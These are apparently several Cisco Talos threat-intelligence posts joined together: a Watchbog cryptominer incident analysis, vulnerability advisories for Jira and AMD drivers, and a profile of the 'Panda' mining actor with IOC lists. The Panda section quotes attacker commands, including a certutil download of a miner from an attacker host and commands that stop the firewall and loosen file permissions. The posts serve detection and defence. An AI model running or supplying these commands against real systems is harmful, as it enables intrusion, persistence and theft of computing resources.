What Happened?

Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog cryptomining botnet. The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.

This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker's intentions and abilities on a customer's network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts.

There were some attempts at obfuscation, such as base64 encoding URLs and Pastebins, but the attack was still relatively simple to uncover - this attacker did not practice particularly strong operational security.

The attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any "real" hackers could do so. During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the "positive" intentions of this adversary. Below is a message left on a compromised system by the adversary:

What does Watchbog do?

The Watchbog botnet mines Monero cryptocurrency for its owners. While researching our variant we came across a post by Alibaba Cloud Security that provides some insights into Watchbog. This post coincided with our findings as we found an installation script that performs the following activities.

First the installation script checks for running processes matching other cryptocurrency miners. If the system was previously configured to mine cryptocurrency, the installation script would terminate their execution using the kill command:




The script then uses the touch command to determine its capability to write to various directories on the filesystem.




It also checks the architecture of the system to determine if it is executing on a 32-bit or 64-bit operating system and then makes three attempts to download and install a 'kerberods' dropper using wget or curl.



Depending on permissions, the kerberods dropper is saved to one of the following directories:

• The current working directory
• /usr/bin
• /usr/libexec
• /usr/local/bin
• /tmp
• /usr/sbin

The script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information. CSIRS verified this as the same wallet ID as the one used by the attacker referenced in the Alibaba cloud post referenced earlier.



Though the Pastebin URL in the previous screenshot is no longer accessible, the next step in the infection process is to download the cryptocurrency miner. We identified a script that 'kerberods' likely runs to reach out to GitHub to install the XMR-Stak Monero miner.

The main part of the script checks to see if a process called 'watchbog' is running.



If the 'watchbog' process is not detected, the 'testa' or 'download' functions are called to install the version of the miner that's compatible with the host operating system and architecture and execute it to begin the mining process.

'Testa' function

As previously mentioned, the 'testa' function may be called to facilitate the infection process. Below is the code associated with this function. This code is responsible for writing the various configuration data used by the mining software. The function declares three variables and assigns base64 encoded data to each of them.



The base64 encoded data is then decoded and written to various files.



The base64 encoded values correspond to the following:

• St_64: This variable contains the URL of the Github repository that hosts the XMR-Stak mining client.

• hXXps://github[.]com/fireice-uk/xmr-stak/releases/download/2.10.3/xmr-stak-linux-2.10.3-cpu.tar.xz

• con_url: This variable contains the Pastebin URL that is used to host the configuration file for the mining client.

• hXXps://pastebin[.]com/raw/YJH8sWr

• Cpu_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.

• hXXps://pastebin[.]com/raw/irzk5mSh

• poo_url:This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.

• hXXps://pastebin[.]com/raw/aJkbTx6Y

The script then starts the Watchbog process and deletes the text file after downloading the encoded Pastebins as a text file and giving it execution permissions. The following screenshot shows the configuration file that is referenced by the con_url variable in the 'testa' function.

'download' function

The following code is associated with the 'download' function referenced by the installation script previously described. Similar to what was described in the 'testa' function, it contains three declared variables with base64 encoded assignments.



These base64 encoded strings correspond to the following:

• mi_64: This variable contains the Github URL that hosts the XMrig monero mining client.

• hXXps://github[.]com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz

• mi_32: This variable contains a Pixeldrain URL. During our investigation the URL was no longer accessible.

• hXXps://pixeldrain[.]com/api/file/ZuVWceWG

• der_ke: This variable contains a Pastebin URL. The URL was used to host a file containing the attacker(s) Monero Wallet ID for the miner to use. This Wallet ID is used to facilitate payment to the attacker. All Monero successfully mined by clients under the attacker's control will transfer the Monero to the Wallet ID specified in this file. The same wallet is included in the Alibaba Cloud post mentioned earlier.

• hXXps://pastebin[.]com/raw/hURdMBLd

The download function then writes the contents retrieved from the specified URLs to various file locations. It then determines the architecture of the system and installs the appropriate mining client and executes it to initiate the mining process.




The following screenshot contains the contents of the Monero wallet configuration associated with the der_ke variable in the 'download' function described earlier. It specifies the configuration parameters that will be used by the mining client, including the Wallet ID, mining pool URL, and other parameters that can be used to control CPU usage, logging, etc.

Lateral movement via SSH

CSIRS identified that the adversary was using SSH to spread laterally. Although local logs were unavailable, we were able to use network logs to gain an understanding of how the malware was spreading. As we viewed the logs, it was easy to determine Watchbog's lateral movement mechanism because they were generating a large amount of SSH traffic. This could have been easily detected using internal traffic flow monitoring, such as with StealthWatch Cloud or other netflow-monitoring capability.

The following Bash script was used to facilitate the lateral movement process. It retrieves the contents of the known_hosts file on the infected system and then attempts to SSH into those systems. It also checks for the existence of SSH keys and leverages them to authenticate to the systems in the known_hosts file. If successful, it will retrieve the contents of the Pastebin URL previously described and initiate the infection process.

Lateral movement via Jenkins and Redis servers

In addition to leveraging SSH for lateral movement, the Watchbog adversary also attempted to leverage a Python script that scans for open Jenkins and Redis ports on the host's subnet. If the script finds any vulnerable servers, it attempts to use the curl or wget commands to retrieve a payload from Pastebin and execute it on the target.

Based on the following string on line 71, the script targets CVE-2018-1000861, a vulnerability in the Staple web framework for versions up to Jenkins 2.138.1 or 2.145 which handles HTTP requests. It can provide attackers with RCE through particularly crafted URLs. A post by Orange Tsai shows how to exploit this vulnerability by using cross reference objects to bypass ACL policy.



Though the pastes accessed in the script were no longer available, we believe the payload was the installation script for the XMR-Stak miner previously described. The following Python script is also downloaded and executed from the XMR-Stak miner script described above in a function called 'party.'



As can be seen above, the payload variable contains a base64 encoded blob which is then decoded and written to the /tmp directory and executes it. This base64 encoded blob contains a Pastebin URL (hXXps://pastebin[.]com/raw/DzgYb9mu) which was used to host the following Python script. The Python script is used to facilitate the exploitation of the aforementioned vulnerability and initiate the infection process. The following screenshots are associated with this Python script.

Persistence

Watchbog's main persistence mechanism appears to have been using cron jobs. Below is the 'system' function from the 'kerberods' installation script which ensures the dropper will call out to Pastebins every hour for new information. The below screenshot shows the way that Watchbog configures the cron jobs responsible for achieving persistence on infected systems.



In a post by Renato Marinho from Morphus Labs, he mentions a very interesting way 'kerberods' achieves persistence as well. If it has root privileges, it will download and load a library into the operating system which hooks parts of Glibc to modify Glibc's behavior. The post also specifies that the hooks allow the miner to run as anyone (including root) and also obfuscates the network connection to the mining pool as well as the Redis/Jenkins server scans.

Covering their tracks

Evidence deletion has been identified in previous Watchbog variants. The Watchbog variant in our incident continued this trend. Evidence deletion was performed in a clear manner with files and logs being deleted or overwritten. The evidence deletion was typically added to the end of a handful of the Pastebin scripts, with the Xmr-stak download and the SSH Lateral Movement scripts being prime examples. The loss of those key pieces of evidence made analysis difficult, but not impossible. We were able to rely upon our clients centralized logging to fill in those holes, and the hosts themselves still had evidence. The most obvious being the malware variants themselves.

Conclusion

Unpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed. Once that foothold has been established, the attacker can then connect to their C2, achieve persistent long-term access to the environment and spread laterally — which is exactly what happened in this case. The best way to prevent such activity would be to ensure that all enterprise web applications are up to date. Patching can cause some operational gaps and delays, so it’s also important to have a maintenance window and a test environment to ensure that the new patches do not cause any issues. Identifying cryptomining activity can be done effectively by following security fundamentals. Establish a baseline for internal network traffic and if any significant deviations occur, identify and investigate them. Even if there is an existing theory for the activity. In this case, Watchbog generated a noticeable spike in the organization’s SSH traffic.

Coverage

Intrusion prevention systems such as SNORT® provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

Additional ways our customers can detect and block these threats are listed below.



Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)

The following IOCs have been observed associated with Watchbog.

Hashes (SHA256):

b383d0fdfa5036ccfa5d9c2b43cbfd814bce8778978873057b86678e5295fc61 0b0567c9b45ea0a3ea4267001f0760ccdf2b8224fceaf8979d32fcceb2d6fb7a

3A6271A90D0F6CC8A2D31D45D931E8401F13F7377932BA07D871DC42F252B9CA

Domains:

aziplcr72qjhzvin[.]onion[.]to

Misc:

Monero Wallet (Same wallet as the Alibaba Cloud Post)

47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

You’ve heard it a million times: Always patch. But in case you needed another example that it’s important, Cisco Incident Response took a deep dive into a recent wave of Watchbog infections they observed. In this post, IR breaks down why this infection occurred, and what you can learn from it. 

Speaking of patching, it’s as good of a time as any to update all of your Microsoft products. The company released its latest security update as part of their monthly Patch Tuesday. Check out our breakdown of the most important vulnerabilities here and our Snort coverage here.

Ever considered an “illustrious career in cybercrime?” Well, don’t do it. So says Craig on the latest Beers with Talos podcast where the guys talking about “hacking back” and Matt’s level of Twitter fame.

We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: “DNS on Fire” at Virus Bulletin 2019
Location: Novotel London West hotel, London, U.K.
Date: Oct. 2 - 4
Speaker: Warren Mercer and Paul Rascagneres
Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

Notable recent security issues

Title: Microsoft patches 19 critical bugs as part of security update  
Description: Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 85 vulnerabilities, 19 of which are rated “critical," 65 that are considered "important" and one "moderate." There is also a critical advisory relating to the latest update to Adobe Flash Player. This month’s security update covers security issues in a variety of Microsoft services and software, including the Jet Database Engine and the Hyper-V hypervisor.
Snort SIDs: 51436 - 51438, 51445, 51446, 51449 - 51452, 51454 - 51457, 51463 - 51465, 51479 – 51483

Title:Some NETGEAR routers vulnerable to DoS attacks  
Description: The NETGEAR N300 line of wireless routers contains two denial-of-service vulnerabilities. The N300 is a small and affordable wireless router that contains the basic features of a wireless router. An attacker could exploit these bugs by sending specific SOAP and HTTP requests to different functions of the router, causing it to crash entirely. 
Snort SIDs: 50040 (Written by Dave McDaniel)

Most prevalent malware files this week

Ben Taylor of Cisco ASIG discovered these vulnerabilities.

Atlassian’s Jira software contains multiple vulnerabilities that could allow an attacker to carry out a variety of actions, including the disclosure of sensitive information and the remote execution of JavaScript code. Jira is a piece of software that allows users to create, manage and organize tasks and manage projects. These bugs could create a variety of scenarios, including the ability to execute code inside of Jira and the disclosure of information inside of tasks created in Jira, including attached documents.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlassian to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Atlassian Jira WikiRenderer parser XSS vulnerability (TALOS-2019-0833/CVE-2019-8444)

An exploitable XSS vulnerability exists in the WikiRenderer functionality of Atlassian Jira, from version 7.6.4 to 8.1.0. A specially crafted comment can cause a persistent XSS. An attacker can create a comment or worklog entry to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira CSRF login vulnerability (TALOS-2019-0834)

An exploitable CSRF vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. The login form doesn't require a CSRF token. As a result, an attacker can log a user into the system under an unexpected account.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira CSRF login vulnerability (TALOS-2019-0835/CVE-2019-14998)

An exploitable CSRF vulnerability exists in Atlassian Jira 7.6.4. An attacker controlling a subdomain different that the Jira hosting subdomain enables cookie injection and control of the CSRF header token. An attacker can create a cookie and submit CSRF attacks on behalf of a logged-in user to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira Issue key information disclosure vulnerability (TALOS-2019-0836/CVE-2019-14995

An issue key information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid issue keys and invalid issue keys via the `/rest/api/1.0/render` API endpoint.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira issue attachment name information disclosure vulnerability (TALOS-2019-0837/CVE-2019-14995)

An issue attachment name information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid attachment names and invalid attachment names for any given issue via `/rest/api/1.0/render` API endpoint.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira Tempo plugin issue summary information disclosure vulnerability (TALOS-2019-0838/CVE-2019-5095)

An issue summary information disclosure vulnerability exists in Atlassian Jira Tempo plugin, version 4.10.0. Authenticated users can obtain the summary for issues they do not have permission to view via the Tempo plugin.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira issueTable username information disclosure vulnerability (TALOS-2019-0839/CVE-2019-XXXX)

A username information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid usernames and invalid usernames via `/rest/issueNav/1/issueTable` API endpoint.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira worklog information disclosure vulnerability (TALOS-2019-0840/CVE-2019-XXXX)

A worklog information disclosure vulnerability exists in Atlassian Jira, versions 7.6.4 to 8.1.0. Authenticated users can view worklog details for issues they do not have permission to view via the `/rest/api/2/worklog/list` API endpoint. They can also obtain a list of worklog ID's via `/rest/api/2/worklog/updated`.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that versions 7.6.4 through 8.1.0 of Atlassian Jira are affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 50110, 50111, 50114

Piotr Bania of Cisco Talos discovered this vulnerability.

Some AMD Radeon cards contain a remote code execution vulnerability in their ATIDXX64.DLL driver. AMD produces the Radeon line of hardware, which includes graphics cards and graphics processing units. This specific vulnerability exists on the Radeon RX 550 and the 550 Series while running VMWare Workstation 15. An attacker could exploit this vulnerability by supplying a malformed pixel shared inside the VMware guest operating system to the driver. This could corrupt memory in a way that would allow the attacker to gain the ability to remotely execute code on the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with AMD to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

AMD ATI Radeon ATIDXX64.DLL shader functionality remote code execution vulnerability (TALOS-2019-0818/CVE-2019-5049)

An exploitable memory corruption vulnerability exists in AMD ATIDXX64.DLL driver, versions 25.20.15031.5004 and 25.20.15031.9002. A specially crafted pixel shader can cause an out-of-bounds memory write. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from within a VMware guest, potentially allowing code execution on the associated VMware host.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that this vulnerability affects AMD ATIDXX64.DLL, versions 25.20.15031.5004 and 25.20.15031.9002, while running on the Radeon RX 550/550 Series. This vulnerability can only be exploited when VMware Workstation 15 version, 15.0.4,build-12990004 with Windows 10 x64 as the guestVM is running.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 49978, 49979

Cisco Talos has updated and expanded the Talos Threat Levels used to describe our web reputation verdicts. 

As you will see in the chart below, we are increasing the amount of reputation verdicts from three to five, as well as retaining the Unknown category across the board. 

Cisco Security products may display these new scores over time, beginning with the upcoming Cisco NGFW release of 6.5. This allows for more granular scoring of web reputation verdicts, and gives customers greater control over the defense of their networks.


At this time, we are not adjusting the Talos Email Reputation scores, and we have no timeframe for doing so.

Here’s a rundown of our new Threat Levels verbiage:


This chart may also be found on our website.

There will be no impact to the efficacy to Talos Web Reputation. For a short period, TalosIntelligence.com will show both the new and the old threat level verdicts.

The ability to dispute the reputation of a domain or URL remains the same, and is available to both customers and non-customers alike by visiting our reputation support portal. After logging in, you may fill out the form (up to 50 entries at a time) with URLs, domains, or IPs and propose a reputation verdict that you think the entry should have.




After you submit a ticket, you can view its real-time status on your “My Tickets” page.

We hope everyone finds these changes useful. As always, Talos’ goal is to keep your network and systems safe.

Marcin Noga of Cisco Talos discovered these vulnerabilities.

Cisco Talos recently discovered multiple remote code execution vulnerabilities in the Aspose.PDF API. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Aspose to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Versions tested

By Christopher Evans and David Liebenberg.

Executive summary

A new threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.

Panda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.

Talos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread "MassMiner" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns.

First sightings of the not-so-elusive Panda

We first observed this actor in July of 2018 exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner that was associated with a campaign called "MassMiner" through the wallet, infrastructure, and post-exploit PowerShell commands used.

Panda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638). They used PowerShell post-exploit to download a miner payload called "downloader.exe," saving it in the TEMP folder under a simple number filename such as "13.exe" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000.

By October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times.
The sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block.

One of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name "Panda."

Bulehero connection

Around the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called "download.exe" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as "13.exe" and execute it. The file server turned out to be an instance of HFS hosting four malicious files.

Running the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining.

Additionally, the sample attempts to shut down the victim's firewall with commands such as "cmd /c net stop MpsSvc". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe.

For example:

cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\appveif.exe /p everyone:F

Both of these behaviors have also been observed in previous MassMiner infections.

The malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign.

Additionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the "Shadow Brokers" exploits and were installed in a suspiciously named directory: "\Windows\InfusedAppe\Eternalblue139\specials\".

Evolution of Panda

In January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China.

Panda used this vulnerability to both directly download a file called "download.exe" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path "/public/hydra.php", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to "/public/hydra.php". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations.

In March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in.

At the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called "download.exe" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named "wercplshost.exe" from fid[.]hognoob[.]se as well as a configuration file called "cfg.ini" from uio[.]hognoob[.]se, which provides configuration details for the miner.

"Wercplshost.exe" contains exploit modules designed for lateral movement, many of which are related to the "Shadow Brokers" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords.

Soon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: "certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe". The coinminer is also run using the command "cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\[filename].exe".

The updated payload still includes exploit modules designed for lateral movement, many of which are related to the "Shadow Brokers" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to "Scant.txt" (note the typo). The sample also writes a list of hardcoded IP ranges to "ip.txt" and passes it to Masscan to scan for port 445 and saves the results to "results.txt." This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords

In June, Panda began targeting a newer WebLogic vulnerability, CVE-2019-2725, but their TTPs remained the same.

Recent activity

Panda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of "a" - "z" characters and the last five consisting of digits (e.g., "xblzcdsafdmqslz19595.exe"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se.

Besides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz.

One difference is that several samples contained a Gh0st RAT default mutex "DOWNLOAD_SHELL_MUTEX_NAME" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior.

On August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as "BBBBB,", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18.

In line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to "oo[.]mygoodluck[.]best:51888:WervPoxySvc", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club.

Cisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best.

Conclusion

Panda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated.

However, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold.

Panda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations.

COVERAGE

For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Domains

a45[.]bulehero[.]in
a46[.]bulehero[.]in
a47[.]bulehero[.]in
a48[.]bulehero[.]in
a88[.]bulehero[.]in
a88[.]heroherohero[.]info
a[.]bulehero[.]in
aic[.]fxxxxxxk[.]me
axx[.]bulehero[.]in
b[.]bulehero[.]in
bulehero[.]in
c[.]bulehero[.]in
cb[.]fuckingmy[.].life
cnm[.]idc3389[.]top
down[.]idc3389[.]top
fid[.]hognoob[.]se
fxxk[.]noilwut0vv[.]club
haq[.]hognoob[.]se
idc3389[.]top
idc3389[.]cc
idc3389[.]pw
li[.]bulehero2019[.]club
list[.]idc3389[.]top
mi[.]oops[.]best
mx[.]oops[.]best
nrs[.]hognoob[.]se
oo[.]mygoodluck[.]best
pool[.]bulehero[.]in
pxi[.]hognoob[.]se
pxx[.]hognoob[.]se
q1a[.]hognoob[.]se
qie[.]fxxxxxxk[.]me
rp[.]oiwcvbnc2e[.]stream
uio[.]heroherohero[.]info
uio[.]hognoob[.]se
upa1[.]hognoob[.]se
upa2[.]hognoob[.]se
wiu[.]fxxxxxxk[.]me
yxw[.]hognoob[.]se
zik[.]fxxxxxxk[.]me

IPs

184[.]168[.]221[.]47
172[.]104[.]87[.]6
139[.]162[.]123[.]87
139[.]162[.]110[.]201
116[.]193[.]154[.]122
95[.]128[.]126[.]241
195[.]128[.]127[.]254
195[.]128[.]126[.]120
195[.]128[.]126[.]243
195[.]128[.]124[.]140
139[.]162[.]71[.]92
3[.]123[.]17[.]223
